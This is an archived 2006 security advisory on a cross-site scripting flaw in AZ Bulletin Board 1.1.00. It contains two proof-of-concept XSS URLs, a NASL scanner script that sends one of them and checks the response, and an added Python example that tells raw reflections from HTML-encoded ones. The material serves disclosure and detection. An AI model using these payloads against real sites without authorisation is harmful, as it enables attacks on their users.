
kapda-22.txt

Date: 29 Jan 2006
Reported by: Roozbeh Afrasiabi
Type: packetstorm
Source: packetstormsecurity.com

Azbb v1.1.00 Cross Site Scripting vulnerability in AZ Bulletin Board

Code
`[KAPDA::#22] - Azbb v1.1.00 Cross Site Scripting  
  
KAPDA New advisory  
  
Vulnerable products : Azbb <= 1.1.00  
Vendor: www.azbb.org  
Risk: Low  
Vulnerabilities: Cross Site Scripting  
  
Date :  
--------------------  
Found : Jan 20 2006  
Vendor Contacted : Jan 21 2006  
Release Date : Jan 21 2006  
  
About :  
--------------------  
AZbb is "a forum that was written with a primary focus on security.  
AZbb does not require a database such as MySQL, PostgreSQL or MSSQL and can even be used as a blog, or a portal".  
  
  
Vulnerability:  
--------------------  
Cross_Site_Scripting (XSS,CSS):  
  
AZ Bulletin Board is affected by a cross-site scripting vulnerability.  
This issue is due to the failure of the application to properly sanitize user-supplied input.  
  
As a result of this vulnerability, it is possible for a remote attacker to create a malicious link containing script code that will be executed in the browser of an unsuspecting user when followed.  
  
  
PoC :  
--------------------  
  
1)  
  
This flaw exists because the application does not validate the "nickname" variable upon submission to the post.php script via the POST method.  
  
h**p://www.[target]/post.php?nickname="><script>alert('XSS')</script><!--  
  
  
  
2)[limited XSS]  
  
h**p://www.[target]/post.php?topic=>"<br><iframe%20src=javascript:alert()><br>"  
  
  
NASL :  
--------------------  
azbb_1100_XSS.nasl  
#  
# This script was written by Pedram Hayati <pi3ch at kapda dot ir>  
# (C) KAPDA Computer Security Science Researchers Institute  
# http://www.kapda.ir  
#  
# This script is released under the GNU GPL v2  
  
if(description)  
{  
script_version ("$Revision: 1.0 $");  
name["english"] = "Azbb XSS";  
  
script_name(english:name["english"]);  
  
desc["english"] = "  
The 'AZ Bulletin Board' PHP is installed. This version is affected by a  
cross-site scripting vulnerability. This issue is due to a failure  
of the application to properly sanitize user-supplied input.  
  
As a result of this vulnerability, it is possible for a remote attacker  
to create a malicious link containing script code that will be executed  
in the browser of an unsuspecting user when followed.  
Original Advisory: http://kapda.ir/advisory-236.html  
Solution : Vendor contacted  
Risk factor : Low";  
  
script_description(english:desc["english"]);  
  
summary["english"] = "Checks post.php XSS";  
  
script_summary(english:summary["english"]);  
  
script_category(ACT_GATHER_INFO);  
  
  
script_copyright(english:"This script is Copyright (C) 2006 Pedram Hayati");  
  
family["english"] = "CGI abuses : XSS";  
family["francais"] = "Abus de CGI";  
script_family(english:family["english"], francais:family["francais"]);  
script_dependencie("cross_site_scripting.nasl");  
script_require_ports("Services/www", 80);  
exit(0);  
}  
  
#  
# The script code starts here  
#  
  
include("http_func.inc");  
include("http_keepalive.inc");  
  
port = get_http_port(default:80);  
  
if (!get_port_state(port))exit(0);  
  
if ( get_kb_item("www/" + port + "/generic_XSS") ) exit(0);  
  
foreach dir (cgi_dirs())  
{  
req = string(dir, "/post.php?topic=>\"<br><iframe%20src=javascript:alert()><br>\" [XSS]");  
req = http_get(item:req, port:port);  
r = http_keepalive_send_recv(port:port, data:req, bodyonly:1);  
if( r == NULL )exit(0);  
# Parentheses are escaped so the pattern matches the literal reflected string  
if (egrep(pattern:"javascript:alert\(\)", string:r))  
{  
security_warning(port);  
exit(0);  
}  
}  
exit(0);  
  
Solution :  
--------------------  
N/A  
  
Original Advisory :  
--------------------  
http://kapda.ir/advisory-236.html  
  
Credit :  
--------------------  
Discovered by Roozbeh Afrasiabi  
roozbeh_afrasiabi {a] yahoo.com  
black_death {a] kapda.ir  
www.persiax.com [currently down]  
  
NASL Script by pi3ch {a] kapda.ir  
KAPDA - Institute for Computer Security Researchers  
http://www.KAPDA.ir  
`
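
Added example (not part of the KAPDA advisory or its NASL script): the script's `egrep` for `javascript:alert()` also matches a response in which the probe came back HTML-encoded, because that substring contains no character an encoder rewrites. The Python below separates a raw reflection from an encoded one; the response bodies and their markup are constructed for illustration and are not AZbb's real output.

```python
import html
import re

# Constructed probe modelled on the advisory's "topic" test string (%20 decoded to a space).
PROBE = '>"<br><iframe src=javascript:alert()><br>"'

# Constructed response bodies; the markup is illustrative, not AZbb's real templates.
SAMPLES = {
    "unsanitized": '<input name="topic" value="' + PROBE + '">',
    "encoded": '<input name="topic" value="' + html.escape(PROBE) + '">',
    "not_reflected": '<input name="topic" value="">',
}


def naive_match(body: str) -> bool:
    """Substring-style check equivalent to grepping for javascript:alert()."""
    return re.search(r"javascript:alert\(\)", body) is not None


def classify_reflection(body: str, probe: str = PROBE) -> str:
    """Return 'raw', 'encoded' or 'absent' for how the probe appears in body."""
    if probe in body:
        return "raw"  # < > " came back intact: the value can break out of its context
    for quote in (True, False):  # encoders differ on whether quotes are escaped
        if html.escape(probe, quote=quote) in body:
            return "encoded"  # metacharacters neutralised: not a finding
    return "absent"


def report(samples: dict = SAMPLES) -> dict:
    """Map each sample name to (naive result, context-aware result)."""
    return {name: (naive_match(body), classify_reflection(body))
            for name, body in samples.items()}


if __name__ == "__main__":
    for name, (naive, verdict) in report().items():
        print(f"{name:14} naive={naive!s:5} verdict={verdict}")
```

Only the `raw` verdict indicates missing output encoding; the naive match alone reports the encoded sample as well.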
